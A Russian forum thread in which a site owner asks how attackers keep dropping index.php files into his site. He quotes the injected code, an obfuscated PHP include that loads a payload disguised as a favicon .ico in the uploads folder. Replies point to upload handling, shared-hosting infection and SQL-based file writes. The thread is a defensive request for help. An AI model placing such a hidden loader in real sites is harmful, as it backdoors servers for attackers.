Не могу найти уязвимость на сайте

@Gerd199 · 07.04.2018, 07:52. **Показов** 626. **Ответов** 5

Студворк — интернет-сервис помощи студентам

Выручайте, постоянно каким то образом в каталоги сайта попадают индексы(index.php) и содержат следующее.

PHP
1
2
3
4
5
6
<?php
/*3778e*/
 
@include "\x2fvar/\x77wwu\x2fuplo\x61ds/0\x31-201\x38/fav\x69con_\x320ea0\x36.ico";
 
/*3778e*/

Кто сталкивался с подобным, как найти бреш в сайте?

@Slash Mix · 07.04.2018, 08:06

Может поможет: https://revisium.com/ai/.

@Gerd199 · 07.04.2018, 08:21 **[ТС]**

А толку? Каждый раз им проверять?

Может тут не то

PHP
1
2
3
4
5
    foreach ($_REQUEST as $key => $value){
        $value = strip_tags($value);
        $value = addslashes($value);
        $data[$key] = trim($value); 
    }

Все переменные пост и гет запросов перебираю через цикл, фильтрую и все в один массив.

@Para bellum · 07.04.2018, 08:28

Тут ничего страшного. Главное, как Вы дальше эти данные используете.
Я бы начал поиск с мест загрузки файлов.

И ещё: может вовсе и не Ваш сайт взломан, а какой-нибудь, который рядом на хостинге. А через него уже другие заражают.

@Gerd199 · 07.04.2018, 08:45 **[ТС]**

Из-за взломов, решил перенести сайт на на другой сервер этого же провайдера. Ничего не изменилось, загружать на сервер файлы можно только изображения.

@Para bellum · 07.04.2018, 08:56

Сообщение от Gerd199

загружать на сервер файлы можно только изображения

Значит там и ищите уязвимость. Если нет, посмотрите, включена ли возможность "SELECT INTO OUTFILE". С помощью неё тоже можно файл создать, если есть SQL-уязвимость.

Новые блоги и статьи Все статьи Все блоги /
Советы по крайней бережливости. Внимание, это ОЧЕНЬ длинный пост. Programma_Boinc 28.12.2025 Советы по крайней бережливости. Внимание, это ОЧЕНЬ длинный пост. Налог на собак: https:/ / ********/ gallery/ V06K53e Финансовый отчет в Excel: https:/ / ********/ gallery/ bKBkQFf Пост отсюда. . .	Кто-нибудь знает, где можно бесплатно получить настольный компьютер или ноутбук? США. Programma_Boinc 26.12.2025 Нашел на реддите интересную статью под названием Anyone know where to get a free Desktop or Laptop? Ниже её машинный перевод. После долгих разбирательств я наконец-то вернула себе. . .	Thinkpad X220 Tablet — это лучший бюджетный ноутбук для учёбы, точка. Programma_Boinc 23.12.2025 Рецензия / Мнение/ Перевод Нашел на реддите интересную статью под названием The Thinkpad X220 Tablet is the best budget school laptop period . Ниже её машинный перевод. Thinkpad X220 Tablet —. . .	PhpStorm 2025.3: WSL Terminal всегда стартует в ~ and_y87 14.12.2025 PhpStorm 2025. 3: WSL Terminal всегда стартует в ~ (home), игнорируя директорию проекта Симптом: После обновления до PhpStorm 2025. 3 встроенный терминал WSL открывается в домашней директории. . .	Как объединить две одинаковые БД Access с разными данными VikBal 11.12.2025 Помогите пожалуйста !! Как объединить 2 одинаковые БД Access с разными данными.
Новый ноутбук volvo 07.12.2025 Всем привет. По скидке в "черную пятницу" взял себе новый ноутбук Lenovo ThinkBook 16 G7 на Амазоне: Ryzen 5 7533HS 64 Gb DDR5 1Tb NVMe 16" Full HD Display Win11 Pro	Музыка, написанная Искусственным Интеллектом volvo 04.12.2025 Всем привет. Некоторое время назад меня заинтересовало, что уже умеет ИИ в плане написания музыки для песен, и, собственно, исполнения этих самых песен. Стихов у нас много, уже вышли 4 книги, еще 3. . .	От async/await к виртуальным потокам в Python IndentationError 23.11.2025 Армин Ронахер поставил под сомнение async/ await. Создатель Flask заявляет: цветные функции - провал, виртуальные потоки - решение. Не threading-динозавры, а новое поколение лёгких потоков. Откат?. . .	Поиск "дружественных имён" СОМ портов Argus19 22.11.2025 Поиск "дружественных имён" СОМ портов На странице: https:/ / norseev. ru/ 2018/ 01/ 04/ comportlist_windows/ нашёл схожую тему. Там приведён код на С++, который показывает только имена СОМ портов, типа,. . .	Сколько Государство потратило денег на меня, обеспечивая инсулином. Programma_Boinc 20.11.2025 Сколько Государство потратило денег на меня, обеспечивая инсулином. Вот решила сделать интересный приблизительный подсчет, сколько государство потратило на меня денег на покупку инсулинов. . . .

@Slash Mix 14 / 13 / 10 Регистрация: 01.04.2018 Сообщений: 106
	07.04.2018, 08:06
	Может поможет: https://revisium.com/ai/. 0

@Para bellum 5755 / 4134 / 1508 Регистрация: 06.01.2011 Сообщений: 11,276
	07.04.2018, 08:28
	Тут ничего страшного. Главное, как Вы дальше эти данные используете. Я бы начал поиск с мест загрузки файлов. И ещё: может вовсе и не Ваш сайт взломан, а какой-нибудь, который рядом на хостинге. А через него уже другие заражают. 0

@Gerd199 Заблокирован
	07.04.2018, 08:45 [ТС]
	Из-за взломов, решил перенести сайт на на другой сервер этого же провайдера. Ничего не изменилось, загружать на сервер файлы можно только изображения. 0